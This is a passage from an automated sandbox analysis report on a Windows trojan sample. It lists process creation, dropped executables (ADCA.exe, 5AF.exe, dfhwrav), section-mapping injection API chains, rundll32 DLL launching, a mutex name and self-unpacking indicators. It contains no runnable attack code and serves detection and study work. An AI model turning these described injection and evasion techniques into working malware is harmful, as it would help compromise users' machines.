                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: 10_2_0088C79C10_2_0088C79C
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: String function: 0040ACB4 appears 34 times
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: String function: 0040A3C0 appears 76 times
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: String function: 0040A0C0 appears 300 times
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeCode function: String function: 0040AEFC appears 33 times
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014CF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014CF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401400 NtAllocateVirtualMemory,0_2_00401400
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401501 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401501
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401427 NtAllocateVirtualMemory,0_2_00401427
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014F0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004014F4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004013F5 NtAllocateVirtualMemory,0_2_004013F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040138D NtAllocateVirtualMemory,0_2_0040138D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F9D GetModuleFileNameW,ExpandEnvironmentStringsW,CreateFileMappingW,GetWindowThreadProcessId,GetTokenInformation,ShellExecuteExW,NtOpenProcess,NtCreateSection,NtMapViewOfSection,NtAllocateVirtualMemory,NtDuplicateObject,NtQuerySystemInformation,NtQueryInformationProcess,NtOpenKey,NtEnumerateKey,RtlCreateUserThread,strstr,0_2_00402F9D
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004014CF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014CF
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401400 NtAllocateVirtualMemory,9_2_00401400
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401501 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401501
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401427 NtAllocateVirtualMemory,9_2_00401427
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004014DB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014DB
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014ED
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004014F0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014F0
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004014F4 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014F4
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_004013F5 NtAllocateVirtualMemory,9_2_004013F5
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_0040138D NtAllocateVirtualMemory,9_2_0040138D
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00402F9D CreateFileMappingW,GetWindowThreadProcessId,GetTokenInformation,ShellExecuteExW,NtOpenProcess,9_2_00402F9D
                Source: file.exeStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: ADCA.exe.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: 5AF.exe.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: dfhwrav.1.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
                Source: 5AF.exe.1.drStatic PE information: Section: .data ZLIB complexity 0.9896875
                Source: file.exeVirustotal: Detection: 33%
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_10-21266
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\dfhwrav C:\Users\user\AppData\Roaming\dfhwrav
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ADCA.exe C:\Users\user\AppData\Local\Temp\ADCA.exe
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5AF.exe C:\Users\user\AppData\Local\Temp\5AF.exe
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5AF.exe "C:\Users\user\AppData\Local\Temp\5AF.exe"
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ADCA.exe C:\Users\user\AppData\Local\Temp\ADCA.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5AF.exe C:\Users\user\AppData\Local\Temp\5AF.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,startJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 688Jump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dfhwravJump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\ADCA.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@13/9@36/7
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_006FC9EE CreateToolhelp32Snapshot,Module32First,9_2_006FC9EE
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Local\Temp\Serpodtudpwhhta.dll,start
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeMutant created: \Sessions\1\BaseNamedObjects\WTfewgNmxpcaVXHKTu
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4912
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: setupapi.pdbf source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: cryptbase.pdbD source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb0f source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msctf.pdby source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: comctl32v582.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wsspicli.pdb6 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: fltLib.pdbR source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mpr.pdbA source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: sechost.pdb0 source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Qrundll32.pdb source: WerFault.exe, 00000013.00000003.506255817.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.489353790.000000000473F000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.494807738.000000000473F000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: Qrundll32.pdb^t source: WerFault.exe, 00000013.00000003.527460296.0000000004740000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000013.00000003.527287787.0000000004740000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 5AF.exe, 00000010.00000002.485930859.0000000000410000.00000040.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000002.517131758.0000000000410000.00000040.00000001.01000000.0000000B.sdmp
                Source: Binary string: C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdbz source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: shell32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: combase.pdbt source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: 5C:\xehalulomuto\5\wacewatolere ciralameko_sunumeginupah\kupuwu.pdb0f source: ADCA.exe, 0000000A.00000000.410105733.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\yepiro_lafonu\vekamogudit62\deney\jef.pdb source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: version.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: propsys.pdb` source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdbB source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: oleaut32.pdbl source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: IC:\yepiro_lafonu\vekamogudit62\deney\jef.pdb0f source: file.exe, 00000000.00000000.243494837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, dfhwrav, 00000009.00000000.369163815.0000000000401000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdbJ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netapi32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.527903261.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 5AF.exe, 00000016.00000002.637978186.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, 5AF.exe, 00000016.00000002.522529716.00000000023B8000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: rundll32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: powrprof.pdbX source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\dohaf\kaxidin\wukoni\wefof\nojeyuve jucahazetozep zisasime.pdb source: 5AF.exe, 00000010.00000000.456599162.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, 5AF.exe, 00000016.00000000.482478776.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.527754656.0000000004961000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: profapi.pdb^ source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netutils.pdb source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: netapi32.pdbk source: WerFault.exe, 00000013.00000003.527963392.0000000004EA6000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeUnpacked PE file: 10.2.ADCA.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeUnpacked PE file: 16.2.5AF.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeUnpacked PE file: 22.2.5AF.exe.400000.0.unpack
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\dfhwravUnpacked PE file: 9.2.dfhwrav.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\ADCA.exeUnpacked PE file: 10.2.ADCA.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.didata:W;.edata:R;.tls:W;.rdata:R;.reloc:R;.rsrc:R;
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeUnpacked PE file: 16.2.5AF.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Source: C:\Users\user\AppData\Local\Temp\5AF.exeUnpacked PE file: 22.2.5AF.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401F47 pushad ; ret 0_2_00401FAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401F62 pushad ; ret 0_2_00401FAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401E7D pushad ; ret 0_2_00401FAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401F2F pushad ; ret 0_2_00401FAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401F3A pushad ; ret 0_2_00401FAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004019C7 push esp; retf 0_2_004019C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402DCB push FFFFFF9Bh; retf 0_2_00402DD5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02071A2E push esp; retf 0_2_02071A2F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02071F96 pushad ; ret 0_2_02072016
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02071FA1 pushad ; ret 0_2_02072016
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02071FAE pushad ; ret 0_2_02072016
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02071FC9 pushad ; ret 0_2_02072016
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02071EE4 pushad ; ret 0_2_02072016
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401F47 pushad ; ret 9_2_00401FAF
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401F62 pushad ; ret 9_2_00401FAF
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401E7D pushad ; ret 9_2_00401FAF
                Source: C:\Users\user\AppData\Roaming\dfhwravCode function: 9_2_00401F2F pushad ; ret 9_2_00401FAF
